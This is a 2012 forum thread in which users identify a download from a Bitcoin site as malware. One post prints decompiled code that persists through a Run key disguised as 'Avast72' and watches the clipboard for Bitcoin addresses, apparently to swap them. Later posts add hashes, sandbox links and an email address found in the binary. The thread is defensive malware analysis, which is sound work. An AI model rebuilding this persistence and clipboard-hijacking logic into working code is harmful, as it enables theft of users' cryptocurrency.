Title: "allseingbiteye" - a virus, or just weird?
Post by: ThePiachu on January 28, 2012, 03:45:25 AM
On the Bitcoin SE someone mentioned this site: http://allseeingbiteye.tk/ Question can be found here: http://bitcoin.stackexchange.com/q/2778/323
Has anyone checked whether this website is distributing some sort of virus?
Title: Re: "allseingbiteye" - a virus, or just weird?
Post by: grue on January 28, 2012, 04:10:28 AM
most likely a virusdecompiled winmain int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) { int v4; // ebx@1 unsigned int v5; // eax@9 SIZE_T v6; // edi@10 HANDLE v7; // esi@10 const char *v8; // ecx@11 HANDLE v9; // eax@11 void *v10; // esi@11 const CHAR *v11; // eax@11 int v12; // ecx@14 int v13; // edi@14 CHAR v14; // al@15 HKEY hKey; // [sp+Ch] [bp-17Ch]@30 char v17; // [sp+13h] [bp-175h]@3 void *v18; // [sp+14h] [bp-174h]@29 unsigned int v19; // [sp+28h] [bp-160h]@28 const char *v20; // [sp+30h] [bp-158h]@9 int v21; // [sp+40h] [bp-148h]@9 unsigned int v22; // [sp+44h] [bp-144h]@9 CHAR ExistingFileName; // [sp+4Ch] [bp-13Ch]@1 char v24; // [sp+61h] [bp-127h]@2 char v25; // [sp+68h] [bp-120h]@1 CHAR String1[52]; // [sp+150h] [bp-38h]@11 unsigned int v27; // [sp+184h] [bp-4h]@1 int v28; // [sp+188h] [bp+0h]@1
v27 = (unsigned int)&v28 ^ __security_cookie; v4 = operator new(4u); *(_DWORD *)v4 = 33120; dword_40D9E4 = v4; memcpy(&ExistingFileName, "c:\\windows\\mcfartietrby.exe", 0x1Cu); memset(&v25, 0, 0xE8u); if ( sub_401040() == *(_DWORD *)v4 + 9 ) --v24; *(_DWORD *)v4 += 9; v17 = strcmp(&ExistingFileName, (const char *)"c:\\windows\\mcfartietray.exe") == 0; if ( sub_401040() == *(_DWORD *)v4 ) { if ( v17 ) { if ( byte_40D9E8 ) GetModuleFileNameA(0, &ExistingFileName, 0x104u); } } if ( CopyFileA(&ExistingFileName, (LPCSTR)"c:\\windows\\mcfartietray.exe", 1) ) { RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 2u, &hKey); RegSetValueExA(hKey, "Avast72", 0, 1u, "c:\\windows\\mcfartietray.exe", 0x1Cu); ShellExecuteA(0, 0, (LPCSTR)"c:\\windows\\mcfartietray.exe", 0, "c:\\", 0); goto LABEL_31; } CreateMutexA(0, 0, "mcfartietray"); if ( GetLastError() == 183 ) { LABEL_31: v0 = 0; return 0; } v5 = GetTickCount(); srand(v5); v22 = 15; v21 = 0; LOBYTE(v20) = 0; if ( v17 ) { while ( 1 ) { do { do { Sleep(0x1F4u); OpenClipboard(0); v7 = GetClipboardData(1u); CloseClipboard(); v6 = GlobalSize(v7); } while ( v6 - 30 > 9 ); OpenClipboard(0); v9 = GetClipboardData(1u); v10 = v9; v11 = (const CHAR *)GlobalLock(v9); lstrcpyA(String1, v11); GlobalUnlock(v10); CloseClipboard(); v8 = v20; if ( v22 < 0x10 ) v8 = (const char *)&v20; } while ( !strcmp(String1, v8) ); v13 = v6 - 1; v12 = 0; if ( v13 <= 0 ) { LABEL_26: if ( String1[0] == 49 || String1[0] == 51 ) { sub_401430(); sub_401590(); if ( v19 >= 0x10 ) operator delete(v18); } } else { while ( 1 ) { v14 = String1[v12]; if ( v14 < 49 || v14 > 57 ) { if ( (v14 < 97 || v14 > 122) && (v14 < 65 || v14 > 90) ) break; } if ( v14 == 108 || v14 == 73 || v14 == 79 || v14 == 48 ) break; ++v12; if ( v12 >= v13 ) goto LABEL_26; } } } } return 0; } it adds a program to system startup. pretty suspicious imo. virus scan https://www.virustotal.com/file/d99c08d052a02e82ca1ae0ca17300f30c2a4fe8861fe8426afb4367b30daa279/analysis/1327723958/ runtime analysis: http://anubis.iseclab.org/?action=result&task_id=17f90702efa19eb14a9df4ac9504bbf98&format=html
Title: Re: "allseingbiteye" - a virus, or just weird?
Post by: dooglus on January 28, 2012, 07:01:55 AM
decompiled winmain
That's pretty impressive. What tool did you use to do that?
Title: Re: "allseingbiteye" - a virus, or just weird?
Post by: sveetsnelda on January 28, 2012, 07:48:46 AM
It even makes the run entry look like it's an antivirus scanner (Avast72). :)
Most certainly a virus/malware/spyware.
Title: Re: "allseingbiteye" - a virus, or just weird?
Post by: CD-RW on February 14, 2012, 09:12:47 AM
Sorry for bumping, I found some new information... A new link got added about a Bitcoin generator on some Tor forum.
"Bitcoin generator.exe" 51.735 bytes. SHA256: 1f39c2b55839ffb833f653c44a6274230f6e61710c03153356911cd8cdd42f7b Virustotal: https://www.virustotal.com/file/1f39c2b55839ffb833f653c44a6274230f6e61710c03153356911cd8cdd42f7b/analysis/
I found this thread due the fact he still uses c:\windows\mcfartietrby.exe I also found this email in the binary data: seren1ty0wns@gmail.com
Threatexpert for the file: http://www.threatexpert.com/report.aspx?md5=ede9632fc341e0279bb3f8a49b8730f1
Title: Re: "allseingbiteye" - a virus, or just weird?
Post by: MPOE-PR on April 20, 2012, 12:50:06 AM
mcfartietray.exe ...McFartieTray?! Sounds foul either way.
|